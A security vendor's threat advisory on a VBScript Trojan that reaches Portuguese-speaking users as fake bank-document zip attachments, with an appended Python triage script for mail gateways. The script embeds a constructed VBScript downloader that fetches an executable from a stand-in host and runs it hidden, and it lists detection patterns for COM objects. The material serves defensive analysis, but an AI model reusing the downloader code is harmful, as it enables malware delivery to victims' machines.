A wave of malicious VBScript may lead to financial fraud (Jan 22, 2016)
The Dell SonicWALL Threats Research team has observed a recent wave of malicious VBScript files targeting the Portuguese-speaking population. These files arrive as attachments to emails purporting to be important bank documents.
Infection Cycle
The file arrives as a zip file attachment to an email.
Figure 1: Spam email with a malicious zip attachment
The archive contains a file with a .vbs (plain VBScript) or .vbe (VBScript encoded with the Windows Script Encoder; Windows Script Host still executes it on double-click) file extension, with names such as the following:
Figure 2: Malicious VBScript filename examples
Upon execution the malware issues DNS queries for several domain names in an attempt to locate its remote server:
Figure 3: DNS queries made to random domain names in attempt to contact the remote server
It then downloads additional malicious files:
Figure 4: HTTP GET request made by this malware
It also attempts to connect to another remote server, possibly to send stolen information out. At the time of analysis that hostname resolved to a sinkhole (abuse-sinkhole.changeip.net), indicating the server had already been taken down.
Figure 5: TCP connection requests made to abuse-sinkhole.changeip.net
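As an added example (not part of the original advisory and not SonicWALL's code), the following Python script triages a zip attachment the way a mail gateway or an analyst might for the infection cycle described above: it flags archive members carrying a Windows Script Host extension (including double extensions such as "document.pdf.vbs") and statically extracts the download and execution indicators from a plain-text VBScript. The archive, the member filename, the script body and the URL in it are constructed for this example and are not taken from the samples described here; encoded .vbe members are reported but not decoded.

```python
import io
import json
import re
import zipfile

# File extensions Windows Script Host executes on double-click.
SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh"}

# Constructed sample VBScript (not the real malware): mimics the behaviour
# described in the advisory: fetches a payload with an HTTP GET, writes it
# to disk and runs it. The hostname and paths are made up.
SAMPLE_VBS = r'''
Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "GET", "http://example-payload.invalid/down/a.exe", False
http.Send
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1
stream.Open
stream.Write http.responseBody
stream.SaveToFile "C:\Users\Public\a.exe", 2
Set sh = CreateObject("WScript.Shell")
sh.Run "C:\Users\Public\a.exe", 0, False
'''


def build_sample_zip() -> bytes:
    """Construct an in-memory zip resembling the attachment (constructed name)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Boleto_Banco.pdf.vbs", SAMPLE_VBS)
    return buf.getvalue()


def script_entries(zip_bytes: bytes) -> list:
    """Return names of archive members whose final extension WSH will execute.
    Only the last extension counts, so 'doc.pdf.vbs' is flagged."""
    names = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            dot = name.rfind(".")
            if dot != -1 and name[dot:].lower() in SCRIPT_EXTENSIONS:
                names.append(name)
    return names


URL_RE = re.compile(r'https?://[^\s"\']+', re.IGNORECASE)
CREATEOBJECT_RE = re.compile(r'CreateObject\s*\(\s*"([^"]+)"\s*\)', re.IGNORECASE)

# COM ProgIDs commonly used by VBScript downloaders for network access,
# writing the payload to disk, and executing it.
SUSPICIOUS_OBJECTS = {
    "msxml2.xmlhttp": "HTTP download",
    "msxml2.serverxmlhttp": "HTTP download",
    "microsoft.xmlhttp": "HTTP download",
    "winhttp.winhttprequest.5.1": "HTTP download",
    "adodb.stream": "write binary to disk",
    "wscript.shell": "execute command",
    "scripting.filesystemobject": "file system access",
}


def extract_indicators(script: str) -> dict:
    """Static triage of plain-text VBScript: URLs and suspicious COM objects.
    A script that both downloads and executes is classed as a downloader."""
    urls = sorted(set(URL_RE.findall(script)))
    objects = {}
    for progid in CREATEOBJECT_RE.findall(script):
        key = progid.lower()
        if key in SUSPICIOUS_OBJECTS:
            objects[progid] = SUSPICIOUS_OBJECTS[key]
    caps = set(objects.values())
    is_downloader = "HTTP download" in caps and "execute command" in caps
    return {"urls": urls, "objects": objects, "downloader": is_downloader}


def triage_attachment(zip_bytes: bytes) -> dict:
    """Run both checks over every script member of the archive."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in script_entries(zip_bytes):
            if name.lower().endswith(".vbe"):
                # Encoded VBScript: decode it (e.g. with a .vbe decoder) first.
                report[name] = {"note": "encoded VBScript; decode before analysis"}
            else:
                text = zf.read(name).decode("utf-8", "replace")
                report[name] = extract_indicators(text)
    return report


if __name__ == "__main__":
    print(json.dumps(triage_attachment(build_sample_zip()), indent=2))
```

The extension check deliberately ignores everything before the last dot, because Explorer hides known extensions by default and a name such as "Boleto.pdf.vbs" displays as "Boleto.pdf". The indicator extraction is a first-pass static filter only: obfuscated scripts that build ProgIDs or URLs from string fragments at runtime will slip past it and need dynamic analysis.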
Our statistics show that countries with Portuguese-speaking populations are the main target of this attack, with Brazil hit most, followed by Portugal, the US, Uruguay and Spain. Signature hits show a clear upward trend in the number of infections detected over the past week.
Overall, this Trojan can download additional malware onto the victim's machine and send sensitive information to a remote server. We urge users to remain vigilant and cautious with unsolicited emails, especially when the sender cannot be verified.
Dell SonicWALL Gateway AntiVirus provides protection against this threat with the following signature:
- GAV: Download.VBS (Trojan)